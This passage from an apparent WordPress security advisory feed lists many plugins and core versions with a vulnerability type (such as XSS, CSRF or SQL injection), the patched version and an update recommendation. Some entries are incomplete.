Recommended Action: Update to version 4.8.9, or a newer patched version

Plugin: Ajax Search Pro

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 4.19
Recommended Action: Update to version 4.19, or a newer patched version

Plugin: GMAce

Vulnerability: Authenticated(Admin+) Directory Traversal
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Contacts Manager

Plugin: The Post Grid – Shortcode, Gutenberg Blocks and Elementor Addon for Post Grid

Vulnerability: Cross-Site Request Forgery in rttpg_spare_me
Patched Version: 5.0.5
Recommended Action: Update to version 5.0.5, or a newer patched version

Plugin: Donation Button

Plugin: WP Express Checkout (Accept PayPal Payments Easily)

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting via pec_coupon[code]
Patched Version: 2.2.9
Recommended Action: Update to version 2.2.9, or a newer patched version

Plugin: Quick Paypal Payments

Vulnerability: Authenticated (Contributor+) Cross Site Scripting
Patched Version: 5.7.26
Recommended Action: Update to version 5.7.26, or a newer patched version

Plugin: WP Safe Search

Plugin: Shopping Cart & eCommerce Store

Vulnerability: Cross-Site Request Forgery via process_bulk_delete_product
Patched Version: 5.4.9
Recommended Action: Update to version 5.4.9, or a newer patched version

Plugin: Block Bad Bots and Stop Bad Bots Crawlers and Spiders and Anti Spam Protection

Vulnerability: Authenticated SQL Injection
Patched Version: 6.60
Recommended Action: Update to version 6.60, or a newer patched version

Plugin: Awesome Filterable Portfolio

Plugin: Simple Share Buttons Adder

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.5
Recommended Action: Update to version 4.5, or a newer patched version

Plugin: iframe

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.0
Recommended Action: Update to version 4.0, or a newer patched version

Plugin: Download Manager

Vulnerability: Contributor+ Cross-Site Scripting
Patched Version: 3.2.47
Recommended Action: Update to version 3.2.47, or a newer patched version

Plugin: LifterLMS – WP LMS for eLearning, Online Courses, & Quizzes

Vulnerability: Arbitrary File Write
Patched Version: 3.37.15
Recommended Action: Update to version 3.37.15, or a newer patched version

Plugin: Quick Paypal Payments

Vulnerability: Unauthenticated Stored Cross Site Scripting
Patched Version: 5.7.26
Recommended Action: Update to version 5.7.26, or a newer patched version

Plugin: Appointment Hour Booking – WordPress Booking Plugin

Vulnerability: CSV Injection
Patched Version: 1.3.73
Recommended Action: Update to version 1.3.73, or a newer patched version

Plugin: Joli Table Of Contents

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: Modern Events Calendar Lite

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 5.16.5
Recommended Action: Update to version 5.16.5, or a newer patched version

Plugin: Wu-Rating

Plugin: Email Template Designer – WP HTML Mail

Vulnerability: HTML Injection
Patched Version: 2.9.1
Recommended Action: Update to version 2.9.1, or a newer patched version

Plugin: Real WYSIWYG

Plugin: Theme Tuner

Vulnerability: Remote File Inclusion
Patched Version: 0.8
Recommended Action: Update to version 0.8, or a newer patched version

Plugin: Chained Quiz

Vulnerability: No subtitle
Patched Version: 1.1.9.1
Recommended Action: Update to version 1.1.9.1, or a newer patched version

Plugin: Sticky Buttons – floating buttons builder

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.2.3
Recommended Action: Update to version 3.2.3, or a newer patched version

Plugin: WP Go Maps (formerly WP Google Maps)

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 9.0.29
Recommended Action: Update to version 9.0.29, or a newer patched version

Plugin: PopCash Code Integration Tool

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: wpForo Forum

Vulnerability: Cross-Site Scripting via s parameter
Patched Version: 1.7.0
Recommended Action: Update to version 1.7.0, or a newer patched version

Plugin: UserPro – Community and User Profile WordPress Plugin

Vulnerability: Authentication Bypass to Administrator
Patched Version: 5.1.2
Recommended Action: Update to version 5.1.2, or a newer patched version

Plugin: GeoDirectory – WP Business Directory Plugin and Classified Listings Directory

Vulnerability: Authenticated(Administrator+) SQL Injection
Patched Version: 2.3.29
Recommended Action: Update to version 2.3.29, or a newer patched version

Plugin: Premmerce Redirect Manager

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.0.12
Recommended Action: Update to version 1.0.12, or a newer patched version

Plugin: Zotpress

Vulnerability: SQL Injection
Patched Version: 6.1.3
Recommended Action: Update to version 6.1.3, or a newer patched version

Plugin: WP STAGING WordPress Backup Plugin – Migration Backup Restore

Vulnerability: Sensitive Information Exposure
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: Royal Elementor Addons and Templates

Vulnerability: Insufficient Access Control to Template Conditions Modification
Patched Version: 1.3.60
Recommended Action: Update to version 1.3.60, or a newer patched version

Plugin: Event Calendar – Calendar

Vulnerability: Missing Authorization to Event Modification
Patched Version: 1.4.7
Recommended Action: Update to version 1.4.7, or a newer patched version

Plugin: ThinkIT WP Contact Form

Vulnerability: Cross-Site Request Forgery
Patched Version: 0.3
Recommended Action: Update to version 0.3, or a newer patched version

Plugin: WP Symposium

Vulnerability: Arbitrary File Upload
Patched Version: 15.1
Recommended Action: Update to version 15.1, or a newer patched version

Plugin: B2BKing — Ultimate WooCommerce Wholesale and B2B Solution — Wholesale Order Form, Catalog Mode, Dynamic Pricing & More

Vulnerability: Missing Authorization to Authenticated(Subscriber+) Price Modification
Patched Version: 4.6.20
Recommended Action: Update to version 4.6.20, or a newer patched version

Plugin: WPS Limit Login

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.4.6.1
Recommended Action: Update to version 1.4.6.1, or a newer patched version

Plugin: Duplicator Pro

Vulnerability: Unauthenticated Sensitive Information Exposure
Patched Version: 4.5.14.2
Recommended Action: Update to version 4.5.14.2, or a newer patched version

Plugin: Legal Pages – Privacy Policy, Terms & Conditions, GDPR, CCPA, and Cookie Notice Generator

Vulnerability: Missing Authorization on ‘deleteLegalTemplate’
Patched Version: 1.3.8
Recommended Action: Update to version 1.3.8, or a newer patched version

Plugin: Subscribe Sidebar plugin by Blubrry

Plugin: SW Ajax WooCommerce Search

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.8
Recommended Action: Update to version 1.2.8, or a newer patched version

Plugin: Dean’s FCKEditor

Plugin: Seriously Simple Podcasting

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: 2.19.1
Recommended Action: Update to version 2.19.1, or a newer patched version

Plugin: AJAX Store Locator

Plugin: PDF Generator for WordPress – Create & Customize PDF for Posts, Pages and WooCommerce Products

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: Ultimate WooCommerce CSV Importer

Plugin: Header Footer Code Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.17
Recommended Action: Update to version 1.1.17, or a newer patched version

Plugin: WP-TopBar

Vulnerability: Cross-Site Scripting
Patched Version: 3.0.5
Recommended Action: Update to version 3.0.5, or a newer patched version

Plugin: WooCommerce

Vulnerability: Cross-Site Scripting
Patched Version: 2.2.11
Recommended Action: Update to version 2.2.11, or a newer patched version

Plugin: ARMember Premium – Membership Plugin, Content Restriction, Member Levels, User Profile & User signup

Vulnerability: Missing Authorization
Patched Version: 5.9.3
Recommended Action: Update to version 5.9.3, or a newer patched version

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via get_inline_svg()
Patched Version: 3.16.5
Recommended Action: Update to version 3.16.5, or a newer patched version

Plugin: SEO by 10Web

Plugin: WordPress Email Marketing Plugin – WP Email Capture

Vulnerability: Information Exposure via wp_email_capture_options_process
Patched Version: 3.11
Recommended Action: Update to version 3.11, or a newer patched version

Plugin: Malware Finder

Plugin: Directorist: AI-Powered WordPress Business Directory Plugin with Classified Ads Listings

Vulnerability: Authenticated (Subscriber+) Insecure Direct Object Reference to Arbitrary Post Deletion in listing_task
Patched Version: 7.5.5
Recommended Action: Update to version 7.5.5, or a newer patched version

Plugin: Easy Testimonials

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.6
Recommended Action: Update to version 3.6, or a newer patched version

Plugin: Hostel

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via Manage Bookings
Patched Version: 1.1.5.2
Recommended Action: Update to version 1.1.5.2, or a newer patched version

Plugin: Gravity PDF

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.3.1
Recommended Action: Update to version 6.3.1, or a newer patched version

Plugin: eCommerce Product Catalog Plugin for WordPress

Vulnerability: Sensitive Information Exposure via CSV Files
Patched Version: 3.3.27
Recommended Action: Update to version 3.3.27, or a newer patched version

Plugin: Download Manager

Vulnerability: Insufficient Authorization to Information Disclosure
Patched Version: 3.2.71
Recommended Action: Update to version 3.2.71, or a newer patched version

Plugin: Arigato Autoresponder and Newsletter

Vulnerability: SQL Injection
Patched Version: 2.5.1.9
Recommended Action: Update to version 2.5.1.9, or a newer patched version

Plugin: CMP – Coming Soon & Maintenance Plugin by NiteoThemes

Vulnerability: Coming Soon & Maintenance Plugin <= 4.0.18
Patched Version: 4.0.19
Recommended Action: Update to version 4.0.19, or a newer patched version

Plugin: Dokan – Powerful WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy

Vulnerability: Authenticated (Vendor+) SQL Injection
Patched Version: 3.7.13
Recommended Action: Update to version 3.7.13, or a newer patched version

Plugin: Catch Breadcrumb

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.5
Recommended Action: Update to version 1.5.5, or a newer patched version

Plugin: WP AutoComplete Search

Plugin: WPCafe – Online Food Ordering, Restaurant Menu, Delivery, and Reservations for WooCommerce

Vulnerability: Cross-Site Scripting
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: PayPal Brasil para WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.4.3
Recommended Action: Update to version 1.4.3, or a newer patched version

Plugin: WP Social Bookmarking Light

Vulnerability: Cross-Site Scripting
Patched Version: 1.7.10
Recommended Action: Update to version 1.7.10, or a newer patched version

Plugin: Qyrr – simply and modern QR-Code creation

Vulnerability: Cross-Site Scripting
Patched Version: 0.8
Recommended Action: Update to version 0.8, or a newer patched version

Plugin: WP fade in text news

Vulnerability: Authenticated (Subscriber+) SQL Injection via Shortcode
Patched Version: 12.1
Recommended Action: Update to version 12.1, or a newer patched version

Plugin: WordPress Contact Forms by Cimatti

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.5.5
Recommended Action: Update to version 1.5.5, or a newer patched version

Plugin: Visual CSS Style Editor

Vulnerability: Unauthenticated Arbitrary Options Update
Patched Version: 7.2.1
Recommended Action: Update to version 7.2.1, or a newer patched version

Plugin: FLOWFACT WP Connector

Plugin: WP Fastest Cache

Vulnerability: Missing Authorization in ‘deleteCssAndJsCacheToolbar’
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: Newsletter – Send awesome emails from WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.2.7
Recommended Action: Update to version 3.2.7, or a newer patched version

Plugin: User Activity Log

Vulnerability: Unauthenticated SQL Injection
Patched Version: 1.6.5
Recommended Action: Update to version 1.6.5, or a newer patched version

Plugin: Easy Digital Downloads – eCommerce Payments and Subscriptions made easy

Vulnerability: PHP Object Injection
Patched Version: 2.5.8
Recommended Action: Update to version 2.5.8, or a newer patched version

Plugin: Hot Files: File Sharing and Download Manager Plugin

Vulnerability: Cross-Site scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: AccessAlly

Vulnerability: Information Exposure
Patched Version: 3.5.7
Recommended Action: Update to version 3.5.7, or a newer patched version

Plugin: WP Maintenance Mode & Site Under Construction

Vulnerability: Cross-Site Request Forgery to Arbitrary Plugin Installation/Activation
Patched Version: 1.9
Recommended Action: Update to version 1.9, or a newer patched version

Plugin: AGP Font Awesome Collection

Plugin: Rate My Post – Star Rating Plugin by FeedbackWP

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.3.5
Recommended Action: Update to version 3.3.5, or a newer patched version

Plugin: Store Locator WordPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.4.9
Recommended Action: Update to version 1.4.9, or a newer patched version

Plugin: Geo Mashup

Vulnerability: < 1.10.4
Patched Version: 1.10.4
Recommended Action: Update to version 1.10.4, or a newer patched version

Plugin: WP Brutal AI

Vulnerability: Cross-Site Request Forgery to SQL Injection
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: Rank Math SEO PRO

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.0.36
Recommended Action: Update to version 3.0.36, or a newer patched version

Plugin: WordPress CRM, Email & Marketing Automation for WordPress | Award Winner — Groundhogg

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 2.7.11.1
Recommended Action: Update to version 2.7.11.1, or a newer patched version

Plugin: Safe SVG

Vulnerability: Denial of Service
Patched Version: 1.9.5
Recommended Action: Update to version 1.9.5, or a newer patched version

Plugin: Easy Table

Vulnerability: Authenticated Stored Cross-Site Scripting via easy-table-test-area parameter
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: Import Export Suite for CSV and XML Datafeed

Vulnerability: Authenticated (Author+) PHP File Creation to Remote Code Execution
Patched Version: 7.9.9
Recommended Action: Update to version 7.9.9, or a newer patched version

Plugin: Modern Events Calendar Lite

Vulnerability: Authenticated SQL Injection
Patched Version: 5.16.6
Recommended Action: Update to version 5.16.6, or a newer patched version

Plugin: WP YouTube Live

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 1.8.3
Recommended Action: Update to version 1.8.3, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: SQL Injection
Patched Version: 3.3.21.2
Recommended Action: Update to version 3.3.21.2, or a newer patched version

Plugin: Click To Tweet

Plugin: WooCommerce Weight Based Shipping

Vulnerability: Cross-Site Request Forgery leading to Plugin Settings Changes
Patched Version: 5.5.0
Recommended Action: Update to version 5.5.0, or a newer patched version

Plugin: OptionTree

Vulnerability: Object Injection Bypass
Patched Version: 2.7.3
Recommended Action: Update to version 2.7.3, or a newer patched version

Plugin: Advance Menu Manager

Vulnerability: Authenticated (Subscriber+) Menu Creation/Deletion
Patched Version: 3.0.7
Recommended Action: Update to version 3.0.7, or a newer patched version

Plugin: WordPress Contact Forms by Cimatti

Vulnerability: Reflected Cross-Site Scripting via ‘form-field-id’, ‘edit-fid’, ‘id’, ‘name’, ‘type’, ‘description’ Parameters
Patched Version: 1.5.5
Recommended Action: Update to version 1.5.5, or a newer patched version

Plugin: Duplicator – Backups & Migration Plugin – Cloud Backups, Scheduled Backups, & More

Vulnerability: Unauthenticated Backup Download
Patched Version: 1.4.7.1
Recommended Action: Update to version 1.4.7.1, or a newer patched version

Plugin: WishSuite – Wishlist for WooCommerce

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.3.5
Recommended Action: Update to version 1.3.5, or a newer patched version

Plugin: Raygun

Vulnerability: Cross-Site Scripting
Patched Version: 1.8.3
Recommended Action: Update to version 1.8.3, or a newer patched version

Plugin: Easy Digital Downloads – eCommerce Payments and Subscriptions made easy

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.10.3
Recommended Action: Update to version 2.10.3, or a newer patched version

Plugin: OneLogin SAML SSO

Vulnerability: Use of Vulnerable Component
Patched Version: 2.4.3
Recommended Action: Update to version 2.4.3, or a newer patched version

Plugin: Advanced Access Manager – Restricted Content, Users & Roles, Enhanced Security and More

Vulnerability: Arbitrary File Overwrite
Patched Version: 2.8.3
Recommended Action: Update to version 2.8.3, or a newer patched version

Plugin: Flickr Gallery

Vulnerability: Unauthenticated PHP Object Injection
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: Disable Comments – Remove Comments & Stop Spam [Multi-Site Support]

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: WassUp Real Time Analytics

Vulnerability: Unauthenticated Stored Cross-Site Scripting via IP
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Thumbnail For Excerpts

Plugin: ACF: Better Search

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.3.1
Recommended Action: Update to version 3.3.1, or a newer patched version

Plugin: Simple Image Manipulator

Vulnerability: Remote File Download
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Appointment Hour Booking – WordPress Booking Plugin

Vulnerability: No subtitle
Patched Version: 1.3.16
Recommended Action: Update to version 1.3.16, or a newer patched version

Plugin: WordPress.com Editing Toolkit

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 3.79150
Recommended Action: Update to version 3.79150, or a newer patched version

Plugin: All in One SEO – Powerful SEO Plugin to Boost SEO Rankings & Increase Traffic

Vulnerability: 4.1.5.2
Patched Version: 4.1.5.3
Recommended Action: Update to version 4.1.5.3, or a newer patched version

Plugin: Jupiter X Core

Vulnerability: Authenticated Privilege Escalation
Patched Version: 2.0.8
Recommended Action: Update to version 2.0.8, or a newer patched version

Plugin: Icegram Engage – Ultimate WP Popup Builder, Lead Generation, Optins, and CTA

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.9.19
Recommended Action: Update to version 1.9.19, or a newer patched version

Plugin: GD Security Headers

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 1.7.1
Recommended Action: Update to version 1.7.1, or a newer patched version

Plugin: Custom Field Template

Vulnerability: Cross-Site Request Forgery via Plugin Options Update
Patched Version: 2.5.9
Recommended Action: Update to version 2.5.9, or a newer patched version

Plugin: Advanced Shipment Tracking for WooCommerce

Vulnerability: Cross-Site Request Forgery via paginate_shipping_provider_list and filter_shipping_provider_list
Patched Version: 3.5.3
Recommended Action: Update to version 3.5.3, or a newer patched version

Plugin: IP Blacklist Cloud

Vulnerability: Directory Traversal
Patched Version: 3.43
Recommended Action: Update to version 3.43, or a newer patched version

Plugin: wpml

Vulnerability: Cross-Site Scripting
Patched Version: 4.6.1
Recommended Action: Update to version 4.6.1, or a newer patched version

Plugin: Better WordPress Google XML Sitemaps (support Sitemap Index, Multi-site and Google News)

Plugin: WP Hotel Booking

Vulnerability: Missing Authorization to Settings Update
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Plugin: Redirection

Vulnerability: Missing Authorization in ‘addRedirectRule’ function
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: WP User Manager – User Profile Builder & Membership

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.0.2
Recommended Action: Update to version 2.0.2, or a newer patched version

Plugin: Image Map Pro – Drag-and-drop Builder for Interactive Images – Lite

Vulnerability: Missing Authorization to Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: QuickSwish – WooCommerce Product Quick View

Vulnerability: Cross-Site Request Forgery to Arbitrary Plugin Activation
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: WP SMS – Ultimate SMS & MMS Notifications, 2FA, OTP, and Integrations with WooCommerce, GravityForms, and More

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.4.9.1
Recommended Action: Update to version 5.4.9.1, or a newer patched version

Plugin: Coming soon and Maintenance mode

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.5.3
Recommended Action: Update to version 3.5.3, or a newer patched version

Plugin: Frontend File Manager Plugin

Vulnerability: Authenticated (Editor+) Directory Traversal
Patched Version: 22.6
Recommended Action: Update to version 22.6, or a newer patched version

Plugin: Store Exporter for WooCommerce – Export Products, Export Orders, Export Subscriptions, and More

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.7.6
Recommended Action: Update to version 1.7.6, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.8.7
Recommended Action: Update to version 2.8.7, or a newer patched version

Plugin: WooCommerce Green Wallet Gateway

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: Slideshow, Image Slider by 2J

Plugin: EWWW Image Optimizer

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.2
Recommended Action: Update to version 2.0.2, or a newer patched version

Plugin: Zip Attachments

Vulnerability: Directory Traversal
Patched Version: 1.5.1
Recommended Action: Update to version 1.5.1, or a newer patched version

Plugin: Slideshow Gallery LITE

Vulnerability: Cross-Site Scripting via method
Patched Version: 1.6.6
Recommended Action: Update to version 1.6.6, or a newer patched version

Plugin: WooCommerce Product Add-ons

Vulnerability: Cross-Site Request Forgery
Patched Version: 6.2.0
Recommended Action: Update to version 6.2.0, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Unprotected REST-API to Email Injection
Patched Version: 3.5.8
Recommended Action: Update to version 3.5.8, or a newer patched version

Plugin: FiboSearch – Ajax Search for WooCommerce

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.17.0
Recommended Action: Update to version 1.17.0, or a newer patched version

Plugin: ShiftController Employee Shift Scheduling

Vulnerability: Reflected Cross-Site Scripting via Query String
Patched Version: 4.9.26
Recommended Action: Update to version 4.9.26, or a newer patched version

Plugin: WP Attachments

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 5.0.6
Recommended Action: Update to version 5.0.6, or a newer patched version

Plugin: Feed Them Social – Social Media Feeds, Video, and Photo Galleries

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.7.0
Recommended Action: Update to version 1.7.0, or a newer patched version

Core: WordPress

Vulnerability: Brute Force Password Recovery Tokens
Patched Version: 4.4
Recommended Action: Update to version 4.4, or a newer patched version

Plugin: Redirection

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2.9
Recommended Action: Update to version 2.2.9, or a newer patched version

Core: WordPress

Vulnerability: Super Admin Multi-Site Installation Object Injection
Patched Version: 3.7.37
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.37, 3.8.37, 3.9.35, 4.0.34, 4.1.34, 4.2.31, 4.3.27, 4.4.26, 4.5.25, 4.6.22, 4.7.22, 4.8.18, 4.9.19, 5.0.15, 5.1.12, 5.2.14, 5.3.11, 5.4.9, 5.5.8, 5.6.7, 5.7.5, 5.8.3

Plugin: Caldera Forms Google Sheets Connector

Plugin: VikBooking Hotel Booking Engine & PMS

Vulnerability: Cross-Site Request Forgery in exec_admin_widget function
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: Easy Forms for Mailchimp

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.8.9
Recommended Action: Update to version 6.8.9, or a newer patched version

Plugin: WordPress File Upload

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.24.1
Recommended Action: Update to version 4.24.1, or a newer patched version

Plugin: Aspose Importer & Exporter (Discontinued)

Vulnerability: Arbitrary File Download
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting via Shortcodes
Patched Version: 3.7.22
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.22, 3.8.22, 3.9.20, 4.0.19, 4.1.19, 4.2.16, 4.3.12, 4.4.11, 4.5.10, 4.6.7, 4.7.6, 4.8.2

Plugin: DeepL API translation plugin

Vulnerability: Cross-Site Request Forgery via wpdeepl_prune_logs
Patched Version: 2.4.1.2
Recommended Action: Update to version 2.4.1.2, or a newer patched version

Plugin: Hummingbird Performance – Cache & Page Speed Optimization for Core Web Vitals | Critical CSS | Minify CSS | Defer CSS Javascript | CDN

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 3.3.2
Recommended Action: Update to version 3.3.2, or a newer patched version

Plugin: Credit Tracker

Plugin: Avirato hotels online booking engine

Plugin: BestWebSoft’s Pinterest

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.5
Recommended Action: Update to version 1.0.5, or a newer patched version

Plugin: Extended Post Status

Vulnerability: Missing Authorization via wp_insert_post_data
Patched Version: 1.0.20
Recommended Action: Update to version 1.0.20, or a newer patched version

Plugin: Contact Form Email

Vulnerability: Captcha Bypass
Patched Version: 1.3.42
Recommended Action: Update to version 1.3.42, or a newer patched version

Plugin: EG-Attachments

Vulnerability: Reflected Cross-Site Scripting via ‘paged’
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Plainview Protect Passwords

Plugin: Use Memcached

Plugin: Portfolio Gallery – Photo Gallery

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.1.11
Recommended Action: Update to version 2.1.11, or a newer patched version

Plugin: WordLift – AI powered SEO – Schema

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.37.2
Recommended Action: Update to version 3.37.2, or a newer patched version

Plugin: Formidable Forms – Contact Form Plugin, Survey, Quiz, Payment, Calculator Form & Custom Form Builder

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.5.7
Recommended Action: Update to version 5.5.7, or a newer patched version

Plugin: 404 SEO Redirection

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: MainWP Broken Link Checker

Vulnerability: Missing Authorization to Arbitrary Plugin Activation
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Stock Exporter for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: Booking Ultra Pro Appointments Booking Calendar Plugin

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.1.9
Recommended Action: Update to version 1.1.9, or a newer patched version

Plugin: Custom Background

Plugin: WP Sitemap Page

Vulnerability: Admin+ Stored Cross Site Scripting
Patched Version: 1.7.0
Recommended Action: Update to version 1.7.0, or a newer patched version

Plugin: Podcast Subscribe Buttons

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.4.2
Recommended Action: Update to version 1.4.2, or a newer patched version

Plugin: PDF Generator For Fluent Forms – The Contact Form Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.8
Recommended Action: Update to version 1.1.8, or a newer patched version

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: Missing Authorization to Settings Update
Patched Version: 3.13.2
Recommended Action: Update to version 3.13.2, or a newer patched version

Plugin: Quill Forms | The Best Typeform Alternative | Create Conversational Multi Step Form, Survey, Quiz, Cost Estimation or Donation Form on WordPress

Vulnerability: Missing Authorization
Patched Version: 3.4.0
Recommended Action: Update to version 3.4.0, or a newer patched version

Plugin: Transposh WordPress Translation

Plugin: Newsletter, SMTP, Email marketing and Subscribe forms by Brevo (formely Sendinblue)

Vulnerability: Reflected Cross-Site Scripting via ‘lang’
Patched Version: 3.1.61
Recommended Action: Update to version 3.1.61, or a newer patched version

Plugin: Zlick Paywall

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.2.2
Recommended Action: Update to version 2.2.2, or a newer patched version

Core: WordPress

Vulnerability: Private Post Disclosure
Patched Version: 3.7.33
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.33, 3.8.33, 3.9.31, 4.0.30, 4.1.30, 4.2.27, 4.3.23, 4.4.22, 4.5.21, 4.6.18, 4.7.17, 4.8.13, 4.9.14, 5.0.9, 5.1.5, 5.2.6, 5.3.3, 5.4.1

Plugin: Chained Quiz

Vulnerability: Reflected Cross-Site Scripting via date
Patched Version: 1.3.2.4
Recommended Action: Update to version 1.3.2.4, or a newer patched version

Plugin: TrustMate.io – WooCommerce integration

Vulnerability: Authenticated (Subscriber+) Arbitrary Settings Update
Patched Version: 1.8.12
Recommended Action: Update to version 1.8.12, or a newer patched version

Plugin: WooCommerce Eway Gateway

Vulnerability: Insecure Direct Object Reference
Patched Version: 3.5.1
Recommended Action: Update to version 3.5.1, or a newer patched version

Plugin: Affiliate For WooCommerce

Vulnerability: Authenticated Insecure Direct Object Reference
Patched Version: 4.8.0
Recommended Action: Update to version 4.8.0, or a newer patched version

Plugin: ARI Stream Quiz – WordPress Quizzes Builder

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.0
Recommended Action: Update to version 1.3.0, or a newer patched version

Plugin: Absolute Privacy

Vulnerability: Authentication Bypass
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: Splash Header

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.20.8
Recommended Action: Update to version 1.20.8, or a newer patched version

Plugin: Portfolio Slideshow Pro

Plugin: Custom Banners

Vulnerability: Cross-Site Scripting
Patched Version: 2.1
